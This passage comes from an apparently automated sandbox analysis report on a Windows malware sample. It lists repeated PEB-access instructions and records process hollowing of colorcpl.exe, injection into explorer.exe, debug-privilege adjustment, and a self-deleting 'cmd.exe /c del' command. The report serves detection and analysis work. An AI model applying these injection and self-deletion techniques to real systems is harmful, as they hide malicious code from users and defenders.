            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014614FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01423884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01423884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0147070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0147070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013ADB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013ADB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014253CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014253CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0145D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01475BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01434257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0145B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0145B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0145FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0145FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014246A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0478C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04717D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04733D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04773540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047A3D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0477A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\colorcpl.exe - Process token adjusted: Debug
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Injects a PE file into a foreign process
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Memory written: C:\Users\user\Desktop\UOMp9cDcqZ.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\colorcpl.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\colorcpl.exe - Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Thread register set: target process: 3472
            Source: C:\Windows\SysWOW64\colorcpl.exe - Thread register set: target process: 3472
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 380000
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Process created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe
            Source: C:\Windows\SysWOW64\colorcpl.exe - Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
            Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp - Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp - Binary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp - Binary or memory string: SProgram Managerl
            Source: explorer.exe, 00000003.00000000.251486008.0000000001128000.00000004.00000020.sdmp - Binary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp - Binary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp - Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Queries volume information: C:\Users\user\Desktop\UOMp9cDcqZ.exe VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
